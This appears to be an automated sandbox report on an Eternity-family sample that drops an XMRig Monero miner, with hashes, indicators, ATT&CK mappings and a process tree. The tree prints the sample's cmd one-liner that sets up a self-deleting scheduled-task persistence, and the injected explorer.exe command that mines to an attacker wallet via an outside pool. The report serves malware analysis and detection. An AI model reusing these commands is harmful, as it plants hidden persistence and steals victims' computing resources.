eternity | 82d4c31b741a633f3eaaf8f6c361b99e5de14060d26457ac1be57bb0f8a1d3bf

Analysis

max time kernel
147s
max time network
30s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
13-05-2023 20:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Size

2.1MB
MD5

d5737f563015ca9df92bf17c6636db42
SHA1

957099807b7ab2e38d583f84fb7059711feec61f
SHA256

a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512

d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518
SSDEEP

49152:kzuzgsK8XCwKyblc81KsH7FtfcaSPL/e6988MKMTq3xJTaUbEyi:NzgEywKybm81KQ7F9caSPi69893Oj81

Score

10^/10

eternity xmrig miner

Malware Config

Extracted

Family

eternity

Wallets

49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW

Signatures

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 18 IoCs

miner

resource	yara_rule
behavioral7/memory/1620-67-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-68-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-69-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-70-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-72-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-71-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-73-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-74-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-77-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-75-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-79-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-81-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-82-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-84-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-83-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-85-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-86-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/1620-88-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Deletes itself 1 IoCs

pid	Process
1952	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
1344	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Loads dropped DLL 1 IoCs

pid	Process
1952	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1192 set thread context of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1108	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
460	PING.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1620	explorer.exe
Token: SeLockMemoryPrivilege	1620	explorer.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 1188 wrote to memory of 1952	1188	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	28
PID 1188 wrote to memory of 1952	1188	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	28
PID 1188 wrote to memory of 1952	1188	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	28
PID 1952 wrote to memory of 268	1952	cmd.exe	30
PID 1952 wrote to memory of 268	1952	cmd.exe	30
PID 1952 wrote to memory of 268	1952	cmd.exe	30
PID 1952 wrote to memory of 460	1952	cmd.exe	31
PID 1952 wrote to memory of 460	1952	cmd.exe	31
PID 1952 wrote to memory of 460	1952	cmd.exe	31
PID 1952 wrote to memory of 1108	1952	cmd.exe	32
PID 1952 wrote to memory of 1108	1952	cmd.exe	32
PID 1952 wrote to memory of 1108	1952	cmd.exe	32
PID 1952 wrote to memory of 1192	1952	cmd.exe	33
PID 1952 wrote to memory of 1192	1952	cmd.exe	33
PID 1952 wrote to memory of 1192	1952	cmd.exe	33
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 1192 wrote to memory of 1620	1192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	35
PID 2020 wrote to memory of 1344	2020	taskeng.exe	37
PID 2020 wrote to memory of 1344	2020	taskeng.exe	37
PID 2020 wrote to memory of 1344	2020	taskeng.exe	37

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1188
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
  2⤵
  - Deletes itself
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1952
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:268
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:460
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:1108
- - C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
    "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1192
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe -a cryptonight -o pool.minexmr.com:4444 -u 49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW.Admin_BPOQNXYB -p x --max-cpu-usage=30 --donate-level=1
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1620

C:\Windows\system32\taskeng.exe
taskeng.exe {1F04F786-0996-4423-A4FA-B2DE89A05684} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2020
- C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
  C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
  2⤵
  - Executes dropped EXE
  PID:1344

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
memory/1188-54-0x000000013F590000-0x000000013F7A6000-memory.dmp

Filesize
2.1MB

Download
memory/1188-55-0x000000001BC20000-0x000000001BCA0000-memory.dmp

Filesize
512KB

Download
memory/1192-62-0x000000013FBC0000-0x000000013FDD6000-memory.dmp

Filesize
2.1MB

Download
memory/1192-65-0x000000001ABB0000-0x000000001AC30000-memory.dmp

Filesize
512KB

Download
memory/1192-87-0x000000001ABB0000-0x000000001AC30000-memory.dmp

Filesize
512KB

Download
memory/1344-91-0x000000001BC50000-0x000000001BCD0000-memory.dmp

Filesize
512KB

Download
memory/1344-90-0x000000001BC50000-0x000000001BCD0000-memory.dmp

Filesize
512KB

Download
memory/1620-73-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-80-0x0000000000270000-0x0000000000290000-memory.dmp

Filesize
128KB

Download
memory/1620-70-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-72-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-71-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-68-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-74-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-76-0x000007FFFFFD8000-0x000007FFFFFD9000-memory.dmp

Filesize
4KB

Download
memory/1620-77-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-75-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-79-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-69-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-81-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-82-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-84-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-83-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-85-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-86-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-67-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-88-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-66-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-64-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1620-63-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads